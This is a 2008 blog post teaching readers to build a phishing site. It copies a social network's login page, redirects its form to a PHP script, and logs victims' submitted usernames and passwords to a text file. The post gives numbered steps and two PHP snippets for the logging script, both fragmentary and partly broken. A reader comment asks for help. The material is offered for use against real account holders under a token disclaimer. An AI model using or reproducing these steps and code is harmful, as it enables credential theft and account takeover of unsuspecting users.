Saturday, November 8, 2008

Trick to hack ids of orkut,Myspace,Facebook,Hi5 and many more

Hello everyone I am writing this post to teach you hacking email accounts.
This trick is known as Phishing.
Lets start.

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action". you should find a command looking like this

or anything alike.

4. change the url (in this case "RANDOM URL") to "next.php"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called next.php and copy / paste this:

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: ");

11. Save this file (next.php)

12. Create a new file called "pass.txt". dont write anything in it. just save it empty. Your done making your phising site!

13. test out your website. type in something in your phisher and then go to filemanager and open "pass.txt" what you wrote should be typed here!

14. if its not typed there you should try editing "next.php" and enter this instead:

header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

i think you know what to do with the "RANDOM" url.

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "password.txt" instead of "pass.txt"

I will not be responsible for misuse of this blog.

Enjoy hacking!!!!!!!!!!!!

1 comment:

faizan wadera said...

hey i have a problem in editing the ACTION part..can u plz explain..